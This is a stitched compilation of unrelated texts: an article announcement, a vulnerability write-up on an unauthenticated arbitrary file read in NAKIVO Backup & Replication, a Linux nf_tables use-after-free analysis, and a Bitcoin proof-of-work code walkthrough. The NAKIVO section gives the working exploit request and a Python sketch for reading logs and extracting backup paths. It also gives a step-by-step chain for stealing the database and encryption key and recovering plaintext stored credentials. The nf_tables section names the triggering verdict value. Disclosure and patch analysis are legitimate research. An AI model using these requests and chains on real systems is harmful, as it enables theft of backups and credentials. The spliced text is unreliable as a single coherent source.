The fifth article (57 pages) of the Exploiting Reversing Series (ERS), a step-by-step research series on Windows, macOS, hypervisors and browsers, is available for reading on:
(PDF): https://exploitreversing.com/wp-content/uploads/2025/03/exploit_reversing_05.pdf
I would like to thank Ilfak Guilfanov (@ilfak on X) and Hex-Rays SA (@HexRaysSA on X) for their constant and uninterrupted support, which has helped me write these articles over time.
The best thing in life is people.
I hope you enjoy reading it and have an excellent day.
Alexandre Borges.
(MARCH/12/2025)
As an industry, we believe that we've come to a common consensus after 25 years of circular debates - disclosure is terrible, information is actually dangerous, it's best that it's not shared, and the only way to really ensure that no one ever uses information in a way that you don't like (this part is key) is to make up terms for your way of doing things.
We have actively petitioned vendors to be more transparent, and we're currently investing a lot of R&D time in the development of the best, thickest and tastiest crayons to sign a pledge (the name of which we haven't decided yet). We're thinking something like Responsible Development Practices. We've also invested in a camera.
Anyway, that was, of course, just a random tangent before we began.
Today, we're here to talk about an unauthenticated Arbitrary File Read vulnerability we discovered in NAKIVO's Backup and Replication solution - specifically in version 10.11.3.86570.
(We didn't check prior versions, and we've struggled to get further information - more on this later.)
In recent times, backup solutions have become targets for a plethora of marketing terms focused around ransomware - logically, because one popular way to help recover from a successful ransomware attack is to have a robust and reliable backup solution in place.
As we've seen in numerous incidents, though, ransomware gangs tend to prefer situations in which they get paid, and typically go that extra mile you'd expect from a 10x operator to ensure their victims can't simply roll their systems back, including nuking and destroying any in-place backup mechanisms.
To prove our point, we can look at Veeam - one of the bigger players in the backup and recovery space. For whatever unknown reason, Veeam solutions have been a staple within CISA's Known Exploited Vulnerabilities list - demonstrating, even tenuously, that attackers do see value in the targeting of backup solutions.
Beyond being a backup solution in the most simplistic and logical sense, NAKIVO Backup and Replication, like any modern backup solution, boasts endless integrations - it'll integrate into your hypervisors, your cloud environments, and more.
All these integrations are nice, but from an attacker's point of view, this represents an opportunity - to access these solutions, NAKIVO is typically configured with credentials that allow access to the aforementioned environments (you can see where this is going).
An interesting and natural APT target, and thus we decided to take a look.
As a preface and some context, the NAKIVO Backup & Replication solution is made up of a number of components.
However, today our focus will be Director - a central management HTTP interface that listens on 4443/TCP (we didn't bother going further, to be honest).
After deploying the Windows instance of this solution, we quickly got to work building a picture of how this system worked - handily supported by installation files deployed to: %ProgramFiles%\NAKIVO Backup & Replication
A quick glance shows us a Tomcat folder and a bunch of jar files - fantastic news.
As always, our first aim is to understand what we're looking at, and map functionality so that we can ultimately begin to understand where we should begin prodding. As with Tomcat applications deployed via war files, the web.xml defines the routes available to the application and the corresponding servlet that supports requests to defined endpoints.
For example, within this file:
<servlet>
<servlet-name>dispatcher</servlet-name>
<servlet-class>org.springframework.web.servlet.DispatcherServlet</servlet-class>
<load-on-startup>2</load-on-startup>
</servlet>
<servlet-mapping>
<servlet-name>dispatcher</servlet-name>
<url-pattern>/c/*</url-pattern>
</servlet-mapping>
In the above example, we can see that any value that follows on from the /c/ URI is mapped to the Spring Framework class org.springframework.web.servlet.DispatcherServlet.
This is typically driven by its accompanying dispatcher servlet configuration file, which contains directives on how the servlet behaves.
For example, within this file (dispatcher-servlet.xml), we find the tag <context:annotation-config/>, which enables support for annotated controllers (@Controller or @RestController) and handler methods (@RequestMapping, @GetMapping, etc.) for jar files loaded within the classpath.
Looking outside the Tomcat folder, we find a large jar file named backup_replication.jar which contains usage of these annotations.
For example, we found the following annotation within com/company/product/ui/actions/LoginController.java; as can be seen below, the @RequestMapping maps to the URI /login.
@Controller
@RequestMapping({"/login"})
public class LoginController
extends AbstractController
{
@Autowired
@Qualifier("SettingsService")
private SettingsService settingsService;
@Autowired
private RegistrationService registrationService;
@Autowired
private ConfigurationInfoService configurationInfoService;
@Autowired
private WebApplicationContext applicationContext;
private static final Gson gson = SerializationUtils.createGsonSerializer().create();
@RequestMapping(method = {RequestMethod.GET})
public ModelAndView getIndex(Locale locale, HttpServletResponse response, HttpServletRequest request) {
CanTryResponse canTryResponse;
CanUseDefaultCredentialsResponse defaultCredentialsResponse;
addSecurityHeaders(response::addHeader);
By combining the prefix of the url-pattern in the web.xml with the @RequestMapping above, we arrive at a URI of /c/login to reach the login page. Fairly simple.
However, grabbing out the assorted controllers, we were disappointed to identify that only a small number were reachable without authentication, due to a filter being in place. Since authenticated vulnerabilities typically aren't our focus, we're restricted to the following paths:
One endpoint stood out - /c/router.
When initially browsing through the Director interface, this endpoint was heavily utilised to call various actions and methods.
Millions of years of evolution gave us a hint that this may be an interesting place to start - and so we began to review HTTP requests like the following in more depth:
POST /c/router HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Connection: keep-alive
Content-Length: 98
{"action":"AutoUpdateManagement","method":"getState","data":null,"type":"rpc","tid":3980,"sid":""}
Seeing a request like this piques our interest (and we're sure yours) because of the typically sensitive meaning of the words action and method.
In a bid to figure out at a high level how the solution works, we began to build a suspicion that action is literally mapped to Java classes, and method is literally mapped to methods in a class file.
Just grep'ing through the code, this begins to be confirmed:
@Service
@RemotingApiAction(AutoUpdateManagement.class)
public class AutoUpdateFacade
implements AutoUpdateManagement
{
@Autowired
private AutoUpdateService autoUpdateService;
@Autowired
@Qualifier("AlerterAutoUpdate")
private Alerter alerter;
@Autowired
private LicensingService licensingService;
@Autowired
private AuthenticationService authenticationService;
[..Truncated..]
@RemotingApiMethod(isMasterTenantAllowed = true, isTenantAllowed = false)
@Secured({"PERMISSION_VIEW_PRODUCT_AUTO_UPDATE"})
public boolean checkUpdateByServer() throws AutoUpdateManagementException {
return this.autoUpdateService.isCheckUpdateByServerFailed();
}
@RemotingApiMethod(isMasterTenantAllowed = true)
public AutoUpdateStateDto getState() {
AutoUpdateState state = this.autoUpdateService.getState()
As we can see, RemotingApiAction (whatever this is) is passed something that looks suspiciously similar to our action parameter value AutoUpdateManagement, and the RemotingApiMethod annotation maps to the method getState.
Pulling ourselves back a little, we've never seen the annotation @RemotingApiAction before. Rather rapidly, we decided that this was a custom implementation specific to this NAKIVO solution, and lo and behold we found it defined within com.company.product.direct.server.rpc.annotations.RemotingApiAction, with the associated methods within com.company.product.direct.server.rpc.annotations.RemotingApiMethod.
It doesn't take a genius to confirm that the annotation @RemotingApiAction maps to the action parameter and @RemotingApiMethod to the method parameter.
Now that we're beginning to piece things together, a very rapid sift through the code reveals over a thousand occurrences of @RemotingApiMethod being utilised, which gives us a fairly large amount of code to review. We're lazy - we're not a PSIRT team - we just want the unauthenticated methods.
If you read the code snippet above again, like us you'll notice the @Secured annotation for the checkUpdateByServer method. This appears to be the mechanism by which the NAKIVO solution defines the roles and permissions needed to access a specific function - in this instance, @Secured({"PERMISSION_VIEW_PRODUCT_AUTO_UPDATE"}).
So, we went back to our rapid sift, and effectively excluded anything that was accompanied by any @Secured annotation.
For example, the following snippet was not accompanied by a @Secured annotation:
@Service
@RemotingApiAction(VmAgentDiscoveryManagement.class)
public class VmAgentDiscoveryFacade
implements VmAgentDiscoveryManagement
{
[..Truncated..]
@RemotingApiMethod(isMasterTenantAllowed = true)
@Transactional(readOnly = true)
public TransporterHostDto getVmAgentByVmId(String id) throws VmAgentDiscoveryException {
try {
ValidationUtils.assertNotNull(id, "common.error.empty.value", new Object[] { "id" });
TransporterHost th = this.transporterService.getByVmVid(id);
th = (TransporterHost)this.gr.reattach((Identifiable)th);
return (th != null) ? this.transporterDtoHelperService.toDto(th) : null;
} catch (Exception e) {
throw new VmAgentDiscoveryException(e);
}
}
We can reach this, without authentication, with the following request to /c/router:
POST /c/router HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Connection: keep-alive
Content-Length: 121
{"action":"VmAgentDiscoveryManagement","method":"getVmAgentByVmId","data":["watchTowr"],"type":"rpc","tid":3980,"sid":""}
Note how we supply the action of VmAgentDiscoveryManagement and the method of getVmAgentByVmId.
There are all sorts of pre-authenticated actions and methods that take in magical DTOs, and, bluntly, to review these comprehensively we'd have to spend time building out valid data structures and requests - strong pass, and in our experience, this level of effort just isn't needed.
So, we spent another five minutes looking for more endpoints, and found the following gem:
@Service
@RemotingApiAction(STPreLoadManagement.class)
public class STPreLoadFacade
implements STPreLoadManagement
{
[..Truncated..]
@RemotingApiMethod
public byte[] getImageByPath(String path) throws MspManagementException {
try {
return this.brandingService.getImageByPath(path);
} catch (Throwable t) {
throw new MspManagementException(t);
}
This method, which maps to the action STPreLoadManagement, looks interesting - getImageByPath sounds mysterious and unclear as to what it might do.
Naturally, we follow the call trace into brandingService.getImageByPath:
public byte[] getImageByPath(String path) throws IOException {
String newPath = path.replace("/c", "userdata");
File file = new File(newPath);
return FileUtils.readFileToByteArray(file);
}
It appears that the getImageByPath method takes a parameter (path) and immediately uses that path to read a file to a byte array (or, we assume so, by the once again ambiguous readFileToByteArray).
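Condensed into a quick Python sketch (ours, purely illustrative - not NAKIVO's code), the logic amounts to this:

```python
# Illustrative re-implementation of the decompiled logic above (not NAKIVO's actual code).
def get_image_by_path(path: str) -> bytes:
    new_path = path.replace("/c", "userdata")  # only rewrites the literal substring "/c"
    with open(new_path, "rb") as f:            # no canonicalisation, no base-directory check
        return f.read()

# An absolute path sails straight through: "C:/windows/win.ini" contains no "/c"
# substring, so it is opened verbatim.
print(get_image_by_path("C:/windows/win.ini")[:32])
```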
Throwing caution to the wind, we just give it a shot:
POST /c/router HTTP/1.1
Host: {{Hostname}
Content-Type: application/json
Connection: keep-alive
Content-Length: 121
{"action":"STPreLoadManagement","method":"getImageByPath","data":["C:/windows/win.ini"],"type":"rpc","tid":3980,"sid":""}
And what do we get back?
HTTP/1.1 200
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Strict-Transport-Security: max-age=31536000; includeSubDomains
Cache-Control: max-age=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 466
Keep-Alive: timeout=60
Connection: keep-alive
{"action":"STPreLoadManagement","method":"getImageByPath","tid":"3980","type":"rpc","message":null,"where":null,"cause":null,"data":[59,32,102,111,114,32,49,54,45,98,105,116,32,97,112,112,32,115,117,112,112,111,114,116,13,10,91,102,111,110,116,115,93,13,10,91,101,120,116,101,110,115,105,111,110,115,93,13,10,91,109,99,105,32,101,120,116,101,110,115,105,111,110,115,93,13,10,91,102,105,108,101,115,93,13,10,91,77,97,105,108,93,13,10,77,65,80,73,61,49,13,10]}
That's an interesting-looking series of numbers.
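Each element of the data array is just one byte of the requested file, so turning it back into text is a one-liner (quick sketch):

```python
# Decode the "data" array from the JSON response back into the file's contents.
data = [59, 32, 102, 111, 114, 32, 49, 54, 45, 98, 105, 116, 32, 97, 112, 112,
        32, 115, 117, 112, 112, 111, 114, 116, 13, 10, 91, 102, 111, 110, 116,
        115, 93, 13, 10]  # first few bytes of the response shown above
print(bytes(data).decode("latin-1"))
# ; for 16-bit app support
# [fonts]
```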
Well, OK - that was a little simpler than expected. We have an unauthenticated Arbitrary File Read vulnerability - with the added benefit that (per what we saw, and our own default deployment) the NAKIVO solution runs as a superuser regardless of platform (i.e. we can read anything, including /etc/shadow if deployed on Linux, for example).
Not great, but it's not RCE.
We've found an unauthenticated Arbitrary File Read vulnerability that, simply put, now allows us to read any file on the target host. But what can we use this for?
Well, rubbing our collective two and a half braincells together, we think back to the actual purpose of this solution - to store backups.
Can't we just... request the backups themselves? Ultimately, they're likely to contain all the juicy info we're looking for.
Where would they be?
After playing around with the software and backing up a sacrificial Linux server, we found the raw backup file stored on disk, as: C:\NakivoBackup\18ff30f5-cfd6-4708-9220-5ec433075934\ead9e897-7ec7-4612-9855-aa86e364afda.raw
This somewhat complicates things - an attacker needs to somehow enumerate/guess/manifest the correct UUIDs before they can even attempt to read and exfiltrate a server backup.
Well, fortunately or unfortunately, these backup file paths are magically stored in cleartext within the logs of the NAKIVO solution, which are located at logs\0\backup.log and logs\0\controller-physical.log. An attacker can simply use our lovely Arbitrary File Read vulnerability to review these logs, extract the paths to the raw backup files, and subsequently download the backups.
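As a sketch of how trivially this chains together (the endpoint and JSON envelope are exactly as shown above; the log location and the .raw regex below are our own assumptions and may need adjusting per deployment):

```python
# Hedged proof-of-concept sketch: pull a NAKIVO log via the file read, then grep out .raw backup paths.
import re
import requests

TARGET = "https://target:4443"  # placeholder

# Assumption: logs live under the default install directory mentioned earlier.
LOG_PATH = r"C:\Program Files\NAKIVO Backup & Replication\logs\0\backup.log"

def read_file(path: str) -> bytes:
    body = {"action": "STPreLoadManagement", "method": "getImageByPath",
            "data": [path], "type": "rpc", "tid": 1, "sid": ""}
    r = requests.post(f"{TARGET}/c/router", json=body, verify=False)
    # The response's "data" field is a list of byte values; mask in case they come back signed.
    return bytes(b & 0xFF for b in r.json()["data"])

log = read_file(LOG_PATH)
for raw_path in sorted(set(re.findall(rb"[A-Za-z]:\\[^\r\n\"]+?\.raw", log))):
    print(raw_path.decode(errors="replace"))
```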
Well, we guess... there's one minor... ok... major limitation - since the server reads the entire file into RAM before serving it to the friendly requesting user via HTTP, the file has to fit into (virtual) memory. In 2025, a reality in which systems are provisioned with hard disks typically measured in hundreds of GBs, if not TBs, it seems unlikely that the host configured to run this NAKIVO solution will have a sufficient amount of RAM.
In addition, we have to hope that a friendly network admin doesn't notice hundreds of GBs of bandwidth leaving their environment.
Editor: Let's be real, this is not going to be noticed.
With this fairly significant limitation in mind, and disappointed that we felt this vulnerability was becoming a little 'impact-less', we pondered on how we could leverage this into something a little more scary.
We reflected that uninspired attack scenarios could include simply downloading the local database used by the solution, extracting and 'cracking' user passwords, and logging in as a legitimate user - but this would reflect a lot of effort and, as we mentioned earlier, we're lazy. What if someone actually bothered to use strong passwords?
Surprisingly (not really), the solution's default database sits on the filesystem at userdata\db\product01.h2.db.
If we recall back to what we mentioned earlier - the NAKIVO solution integrates into a multitude of system types, and when setting up the solution itself to create backups you do indeed have a multitude of options for adding various 'Inventory' items:
To connect to an AWS S3 bucket for the purposes of performing a backup, you'd logically need AWS keys.
To connect to a Linux host for the purposes of performing a backup, you would require SSH credentials (for example).
To connect to a Domain Controller for the purposes of performing a backup, you would need suitably privileged credentials.
In order for the solution to work, these keys and credentials need to be stored in a non-hashed manner so that the integrations can take place automatically.
Having reviewed the database locally in a text editor, we identified that these keys and credentials are stored encrypted using a key located in: %ProgramFiles%\NAKIVO Backup & Replication\userdata\config.properties
This means it's not just a matter of dumping the DB and running a query.
While all the data is stored within the H2 .db file, the schema is not stored there, making it impossible to simply open it in a client and select data with SQL statements. The NAKIVO solution stores the schema within the application code and formats the .db file at runtime. This leaves us with a couple of options to proceed.
Let's imagine the following, to move past this hurdle: we deploy our own NAKIVO Backup & Replication Director service on a host we control, swap in the 'borrowed' database at %ProgramFiles%\NAKIVO Backup & Replication\userdata\db\product01.h2.db, and drop the matching %ProgramFiles%\NAKIVO Backup & Replication\userdata\config.properties alongside it so the encryption key lines up.
At this point, we could configure backup jobs on our now locally deployed NAKIVO instance to connect to these inventory items (defined in our 'borrowed' database), but that in itself introduces operational hurdles (bandwidth, network connectivity requirements, etc).
Why can't we just get the credentials, and use them as we see fit?
In this example, where NAKIVO has been configured with an SSH username and password pair for this particular inventory item, the password is masked (no, it's not a client-side mask). But, logically, our connection to the host is still successful, and thus somewhere - likely in memory - the configured credentials must exist in plaintext.
Given we're now operating with a 'borrowed' database on our local NAKIVO solution, this is relatively simple to address - we can configure the NAKIVO solution to create a Java Debug session, allowing us to dump memory in full.
To dump this from memory we can create a Java Debug session by adding debug JVM parameters to:
%ProgramFiles%\NAKIVO Backup & Replication\native\win32\backup_replication-service.ini
First, we connect our Java debugger with backup_replication.jar attached as a library, so we can correctly breakpoint the application server.
Secondly, using NAKIVO's GUI, we attempt to edit the connection to the Ubuntu server without changing the username or the starred password; this triggers an HTTP request for the action PhysicalDiscovery and the method update.
Finding this within the library (com/company/product/hypervisors/physical/discovery/core/PhysicalDiscoveryService.class) and setting a breakpoint allows us to dump the cleartext credential for the server.
And just like that, we've demonstrated a clear path from our unauthenticated Arbitrary File Read vulnerability to obtaining all stored credentials utilized by the target NAKIVO solution.
From here, the possibilities are extensive depending on what's been integrated, and go beyond merely stealing backups - to essentially unlocking entire infrastructure environments.
We attempted to disclose this vulnerability to NAKIVO several times via email (13th September 2024 and 2nd October 2024), but did not receive a response. After a month or so, we braved their chat system and engaged with a very confused representative who, somewhat expectedly, didn't really understand our problem.
Fortunately, though, the confusion must have made its way a little further, as we later received an email from NAKIVO support (29th October 2024).
Living our lives peacefully and really not bothering anyone, we eventually identified that NAKIVO had quietly patched the vulnerability in a new release (without announcing the vulnerability via an advisory), and we confirmed that fixes are present in versions v11.0.0.88174 and onwards.
In the patched version, the developers have opted to utilize the FileUtils library with the getFile function, paired with FilenameUtils.getName. With this approach the user-supplied value is reduced to just its filename portion, and a new file path is constructed using fixed directory names ("userdata", "branding") combined with only that filename - parent directory references (../) and other path manipulation are stripped away during the filename extraction, preventing directory traversal attempts.
public byte[] getImageByPath(String path) throws IOException {
String fileName = FilenameUtils.getName(path);
File targetFile = FileUtils.getFile(new String[] { "userdata", "branding", fileName });
if (!targetFile.exists() || !targetFile.canRead() || targetFile.isDirectory()) {
throw new IOException(Lang.get("services.branding.no.file", new Object[0]));
}
return FileUtils.readFileToByteArray(targetFile);
}
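For readers who don't live in Java land, the same sanitisation idea expressed in Python (our analogy, not the vendor's code) looks like this - keep only the basename and pin it under a fixed directory:

```python
import os

BASE_DIR = os.path.join("userdata", "branding")  # fixed directory, mirroring the patched Java

def get_image_by_path(path: str) -> bytes:
    # Mirror FilenameUtils.getName(): strip every directory component, whichever separator is used.
    file_name = os.path.basename(path.replace("\\", "/"))
    target = os.path.join(BASE_DIR, file_name)
    if not os.path.isfile(target):
        raise IOError("no such branding file")
    with open(target, "rb") as f:
        return f.read()

# "C:/windows/win.ini" and "../../etc/passwd" both collapse to a bare filename inside
# userdata/branding, so the arbitrary read from earlier no longer works.
```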
This resolves the vulnerability we identified and detail here today.
However, much to our dismay, when reviewing release notes for the NAKIVO solution, there is no mention of this vulnerability (and of course, no CVE); we can only assume that they reached out to their customer base secretly to inform them to upgrade to v11.0.0.88174 to resolve this vulnerability.
We would be shocked if a vendor tried to sweep a vulnerability this serious under a rug, and knowingly give their customers a misplaced sense of security.
Regardless, we applied for a CVE number ourselves and were allocated CVE-2024-48248, so we can at least reference the vulnerability by this name.
We've said time and time again that bugs, in some form or another, are an inescapable fact of life, and that a vendor's response to a bug is much more important than the presence of a defect itself.
We're not assuming or suggesting here that NAKIVO have responded badly - we of course assume that they contacted all their customers under NDA, and encouraged them quietly to patch, to avoid leaving their customers unknowingly vulnerable.
Regardless of this, we're still in 'not great' territory - software that safeguards large amounts of critical data, as any backup solution does, is bound to be under the scrutiny of motivated and mean attackers. Given a vulnerability so 'simple', it's sometimes hard to believe that we're the only ones that stumbled into it.
As we mentioned previously, we have confirmed that the aforementioned vulnerability has been resolved in v11.0.0.88174.
Beyond this, we are unable to advise as to which versions, and how many versions, preceding this are vulnerable, and can only advise that concerned customers of NAKIVO attempt exploitation of their own servers in order to firmly ascertain their status.
To make this easier, we've supplied a Detection Artifact Generator that also serves as an unofficial NAKIVO customer support tool:
https://github.com/watchtowrlabs/nakivo-arbitrary-file-read-poc-CVE-2024-48248/
Date | Detail |
---|---|
13th September 2024 | Vulnerability discovered |
13th September 2024 | Vulnerability disclosed to NAKIVO in version 10.11.3.86570 |
13th September 2024 | watchTowr hunts through client attack surfaces for impacted systems, and communicates with those affected |
2nd October 2024 | watchTowr follows up, as no response received from NAKIVO via Email |
18th October 2024 | watchTowr is assigned CVE-2024-48248 for this vulnerability |
29th October 2024 | NAKIVO acknowledges the vulnerability via Email |
4th November 2024 | NAKIVO silently patches the vulnerability (v11.0.0.88174) |
26th February 2025 | Blog post and unofficial NAKIVO customer support tool release |
This vulnerability is a use-after-free (UAF) in nf_tables, a component of netfilter, the packet filtering and network address translation (NAT) framework inside the Linux kernel.
The bug occurs during packet processing in nftables, specifically in the nf_hook_slow() and nft_verdict_init() functions.
Below is part of the nf_hook_slow() function.
int nf_hook_slow(struct sk_buff *skb, struct nf_hook_state *state,
                 const struct nf_hook_entries *e, unsigned int s)
{
    unsigned int verdict;
    int ret;

    for (; s < e->num_hook_entries; s++) {
        verdict = nf_hook_entry_hookfn(&e->hooks[s], skb, state);
        switch (verdict & NF_VERDICT_MASK) {
        case NF_ACCEPT:
            break;
        case NF_DROP:
            kfree_skb(skb);                 /* the skb is freed here */
            ret = NF_DROP_GETERR(verdict);  /* error value taken from the upper verdict bits */
            if (ret == 0)
                ret = -EPERM;
            return ret;
        case NF_QUEUE:
            ret = nf_queue(skb, state, s, verdict);
            if (ret == 1)
                continue;
            return ret;
        default:
            /* implicit handling, e.g. NF_STOLEN */
            return 0;
        }
    }
    return 1;
}
The code above is part of the nf_hook_slow() function in the netfilter module; it evaluates the packet-processing rules in a loop. For each hook it obtains a verdict for the packet and decides what to do with it via the NF_VERDICT_MASK macro. The verdict encodes the result of packet processing, and it is a value the user can influence.
In nf_hook_slow(), when the verdict is NF_DROP, kfree_skb() is called to free the packet. Afterwards, if the attacker-controlled verdict value passed to NF_DROP_GETERR(verdict) is 0xFFFF0000, the computation inside that helper sets ret to -65535, and the packet subsequently ends up being handled as if it had been accepted (NF_ACCEPT), so processing continues.
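To make that masking concrete, here is the arithmetic from the paragraph above in plain Python (simply reproducing the values the write-up describes):

```python
# Reproduce the verdict arithmetic described above for an attacker-chosen verdict of 0xFFFF0000.
NF_DROP = 0
verdict = 0xFFFF0000

print((verdict & 0x0000FFFF) == NF_DROP)  # True: the masked verdict reads as NF_DROP, so the skb is freed
print(-(verdict >> 16))                   # -65535: the error value recovered from the upper 16 bits
```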
Below is the nft_verdict_init() function.
static int nft_verdict_init(const struct nft_ctx *ctx, struct nft_data *data,
                            struct nft_data_desc *desc, const struct nlattr *nla)
{
    switch (data->verdict.code) {
    default:
        switch (data->verdict.code & NF_VERDICT_MASK) {
        case NF_ACCEPT:
        case NF_DROP:
        case NF_QUEUE:
            break;
        default:
            return -EINVAL;
        }
    }
    return 0;
}
In nft_verdict_init(), data->verdict.code is the verdict value taken from the rule configuration, and the vulnerability is triggered when an attacker sets it to 0xFFFF0000.
Extracting the lower 16 bits of verdict.code with the NF_VERDICT_MASK macro gives 0xFFFF0000 & 0x0000FFFF = 0x00000000. That value means NF_DROP, so the packet is treated as one to be dropped. In nf_hook_slow(), however, after the drop handling has freed the packet, the NF_DROP_GETERR(verdict) computation sets ret to -65535 and the result is handled as NF_ACCEPT.
As a consequence, the packet that was already freed by kfree_skb() is processed again, referencing the previously freed socket buffer (skb) memory - a use-after-free - and when that socket buffer is later freed once more, a double-free occurs.
The patched nft_verdict_init() function looks like this:
switch (data->verdict.code) {
case NF_ACCEPT:
case NF_DROP:
case NF_QUEUE:
    break;
case NFT_CONTINUE:
case NFT_BREAK:
case NFT_RETURN:
    break;
default:
    return -EINVAL;
}
Validation has been added for the data->verdict.code value. Only the allowed verdict.code values are now processed; if an invalid value comes in, -EINVAL is returned unconditionally, blocking the malicious input. As a result, packets are processed normally and the vulnerability is prevented.
In conclusion, this vulnerability arises when nf_hook_slow() processes a packet and an invalid verdict value causes already-freed memory to be referenced again, leading to a use-after-free (UAF) and a double-free. The patched version resolves the issue by validating verdict.code directly and returning an error for invalid values.
Hello! It's bekim.
In my previous post, I briefly explained that transactions in the Bitcoin network become possible by adding new blocks through a mechanism called 'Proof of Work'. But PoW is not the only consensus algorithm that makes this process work; there are several. A consensus algorithm is the mechanism by which the participants of a blockchain network agree on a single valid block and on how the chain is maintained.
In this post, I'll cover the best-known of them: PoS and PoW, along with DPoS, PBFT, and Hybrid PoW/PoS.
To briefly recap the Proof of Work covered last time: PoW is a scheme in which miners perform computations to find a hash value that satisfies a given difficulty. It was first introduced with Bitcoin, and miners have to repeatedly adjust a Nonce value while searching for the target hash.
Bitcoin is designed so that a block is produced roughly every 10 minutes; to keep that pace, the network adjusts the difficulty about every two weeks (every 2016 blocks).
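As a quick sanity check on those numbers (plain arithmetic, nothing Bitcoin-specific):

```python
# 2016 blocks at a 10-minute target spacing is the "roughly two weeks" quoted above.
blocks, target_spacing_s = 2016, 10 * 60
print(blocks * target_spacing_s)           # 1209600 seconds
print(blocks * target_spacing_s / 86400)   # 14.0 days
```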
Let's take a look at how PoW actually works, based on Bitcoin's latest implementation!
unsigned int GetNextWorkRequired(const CBlockIndex* pindexLast, const CBlockHeader *pblock, const Consensus::Params& params){ assert(pindexLast != nullptr); unsigned int nProofOfWorkLimit = UintToArith256(params.powLimit).GetCompact();// Only change once per difficulty adjustment interval // [1] if ((pindexLast->nHeight+1) % params.DifficultyAdjustmentInterval() != 0) { if (params.fPowAllowMinDifficultyBlocks) { // Special difficulty rule for testnet: // If the new block's timestamp is more than 2* 10 minutes // then allow mining of a min-difficulty block. // [2] if (pblock->GetBlockTime() > pindexLast->GetBlockTime() + params.nPowTargetSpacing*2) return nProofOfWorkLimit; else { // Return the last non-special-min-difficulty-rules-block // [3] const CBlockIndex* pindex = pindexLast; while (pindex->pprev && pindex->nHeight % params.DifficultyAdjustmentInterval() != 0 && pindex->nBits == nProofOfWorkLimit) pindex = pindex->pprev; return pindex->nBits; } } // [4] return pindexLast->nBits; } // Go back by what we want to be 14 days worth of blocks // [5] int nHeightFirst = pindexLast->nHeight - (params.DifficultyAdjustmentInterval()-1); assert(nHeightFirst >= 0); const CBlockIndex* pindexFirst = pindexLast->GetAncestor(nHeightFirst); assert(pindexFirst); return CalculateNextWorkRequired(pindexLast, pindexFirst->GetBlockTime(), params);}
[1] Bitcoin adjusts its difficulty every 2016 blocks. If the height of the next block (pindexLast->nHeight+1) is not a multiple of 2016 (params.DifficultyAdjustmentInterval()), the difficulty is left unchanged and the previous block's difficulty (pindexLast->nBits) [4] is kept.
[2] On Testnet, however, a special rule applies: if no new block has been produced for more than twice the target spacing (2 x 10 minutes = 20 minutes) since the previous block, the difficulty is temporarily dropped to the minimum (nProofOfWorkLimit).
[3] Even if Testnet drops the difficulty to the minimum, the difficulty returns to its previous level once normal blocks are produced again. To do this, the code walks back through earlier blocks to find the most recent block with a normal difficulty and keeps that difficulty.
const CBlockIndex* pindex = pindexLast;
while (pindex->pprev &&
       pindex->nHeight % params.DifficultyAdjustmentInterval() != 0 &&
       pindex->nBits == nProofOfWorkLimit)
    pindex = pindex->pprev;
return pindex->nBits;
To do this, Bitcoin starts from the most recently added block (pindexLast) and follows the chain backwards (while (pindex->pprev)): it skips blocks that were mined at the minimum difficulty (pindex->nBits == nProofOfWorkLimit) and blocks that have not reached a difficulty adjustment boundary (pindex->nHeight % params.DifficultyAdjustmentInterval() != 0), and stops as soon as it reaches a block where a difficulty adjustment actually took place, keeping that block's difficulty.
[5] However, once the height of the current block (pindexLast->nHeight) reaches the difficulty adjustment interval (a multiple of 2016), the Bitcoin network calculates and applies a new difficulty.
Bitcoin is designed so that if the previous 2016 blocks were produced faster than expected the difficulty goes up, and if they were produced more slowly the difficulty goes down.
unsigned int CalculateNextWorkRequired(const CBlockIndex* pindexLast, int64_t nFirstBlockTime, const Consensus::Params& params){ if (params.fPowNoRetargeting) return pindexLast->nBits; // Limit adjustment step // [1] int64_t nActualTimespan = pindexLast->GetBlockTime() - nFirstBlockTime; // [2] if (nActualTimespan < params.nPowTargetTimespan/4) nActualTimespan = params.nPowTargetTimespan/4; if (nActualTimespan > params.nPowTargetTimespan*4) nActualTimespan = params.nPowTargetTimespan*4; // Retarget const arith_uint256 bnPowLimit = UintToArith256(params.powLimit); arith_uint256 bnNew; // Special difficulty rule for Testnet4 // [3] if (params.enforce_BIP94) { // Here we use the first block of the difficulty period. This way // the real difficulty is always preserved in the first block as // it is not allowed to use the min-difficulty exception. int nHeightFirst = pindexLast->nHeight - (params.DifficultyAdjustmentInterval()-1); const CBlockIndex* pindexFirst = pindexLast->GetAncestor(nHeightFirst); bnNew.SetCompact(pindexFirst->nBits); } else { bnNew.SetCompact(pindexLast->nBits); }// [4] bnNew *= nActualTimespan; bnNew /= params.nPowTargetTimespan;// [5] if (bnNew > bnPowLimit) bnNew = bnPowLimit; return bnNew.GetCompact();}
[1] First, the timestamp of the most recent block (pindexLast->GetBlockTime()) is compared with the timestamp of the block 2016 blocks earlier (nFirstBlockTime) to measure how long the previous 2016 blocks actually took; the result is stored in nActualTimespan. This value is the basis for the subsequent difficulty adjustment.
int64_t nActualTimespan = pindexLast->GetBlockTime() - nFirstBlockTime;
[2] Bitcoin measures nActualTimespan and compares it against the target timespan (params.nPowTargetTimespan) before adjusting the difficulty. To stop the difficulty from swinging too violently, the measured timespan is clamped to between one quarter and four times the target timespan.
if (nActualTimespan < params.nPowTargetTimespan/4)
    nActualTimespan = params.nPowTargetTimespan/4;
if (nActualTimespan > params.nPowTargetTimespan*4)
    nActualTimespan = params.nPowTargetTimespan*4;
[3] Next, which block serves as the reference for the difficulty adjustment depends on the value of params.enforce_BIP94.
When this rule is enforced, the difficulty of the first block of the difficulty period, 2016 blocks earlier (pindexFirst->nBits), is used as the reference. This prevents the exceptional case in which the min-difficulty rule would drag the reference difficulty down to the minimum. Otherwise, the difficulty of the current block (pindexLast->nBits) is used as the reference.
This mechanism helps prevent the difficulty from dropping abnormally low in environments such as Testnet.
if (params.enforce_BIP94) {
    // Here we use the first block of the difficulty period. This way
    // the real difficulty is always preserved in the first block as
    // it is not allowed to use the min-difficulty exception.
    int nHeightFirst = pindexLast->nHeight - (params.DifficultyAdjustmentInterval()-1);
    const CBlockIndex* pindexFirst = pindexLast->GetAncestor(nHeightFirst);
    bnNew.SetCompact(pindexFirst->nBits);
} else {
    bnNew.SetCompact(pindexLast->nBits);
}
BIP (Bitcoin Improvement Proposal): a proposal to improve the Bitcoin protocol. BIP94 is one such proposal; during difficulty adjustment it prevents the difficulty on certain networks (such as Testnet4) from being dragged down sharply by the min-difficulty exception.
